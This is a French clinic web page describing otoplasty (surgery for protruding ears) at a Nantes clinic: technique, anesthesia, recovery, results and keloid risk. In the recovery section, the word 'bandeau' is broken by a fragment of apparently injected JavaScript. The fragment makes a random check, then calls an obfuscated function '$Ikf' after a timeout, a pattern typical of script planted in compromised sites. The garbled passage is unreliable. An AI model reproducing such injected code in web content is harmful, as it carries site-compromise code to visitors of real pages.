Une équipe au cœur de votre bien-être

Clinique Bretéché - Nantes

Oreilles décollées

Cette intervention est très fréquemment effectuée chez l’enfant et de façon plus rare chez l’adulte. Le résultat est souvent très bon avec une disparition immédiate des complexes et moqueries provoqués par cette anomalie.

La pratique

Le geste chirurgical consiste à remodeler les cartilages de l’oreille par râpage et mise en place de fils de suture permanents au sein du cartilage. L’oreille sera ainsi repliée et rabattue sans excès en arrière. Les cicatrices résultantes sont situées derrière l’oreille et sont de ce fait quasi invisibles.

Trois types d’anesthésie peuvent être proposés: l’anesthésie locale, l’anesthésie locale approfondie (neuroleptanalgésie) ou l’anesthésie générale, cette dernière étant souvent préférée chez l’enfant. Votre chirurgien et l’anesthésiste que vous verrez en consultation pré opératoire vous en expliqueront les modalités et les applications.

De même l’intervention sera pratiquée en ambulatoire (entrée et sortie le même jour) ou en hospitalisation classique de 24h. Le choix du type de séjour dépendra entre autres de l’éloignement de votre domicile par rapport à la clinique et des habitudes du chirurgien.

Les suites opératoires

Les suites opératoires sont surtout marquées par une rougeur et une sensibilité excessive des oreilles, celles-ci pouvant durer plusieurs semaines. Un bandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeau de contention est appliqué 24h/24 pendant une semaine puis la nuit pendant 15 jours. Pour les enfants, cette intervention est préconisée pendant les vacances scolaires.

Les résultats

Le résultat peut être apprécié dès le 1er mois post opératoire mais sera plus net au bout de 6 mois.
Les complications sont très rares. Toutefois, une évolution défavorable des cicatrices (cicatrices chéloïdes) peut se produire dans environ 1 cas pour 1000 et surtout chez l’adolescent. Votre chirurgien vous donnera toute information concernant cette complication plus gênante que grave et les moyens d’y remédier.

Tous ces aspects seront évoqués avec vous lors d’une consultation personnalisée qui sera à même de répondre à toutes vos interrogations.

Dernière modification : 12/11/2014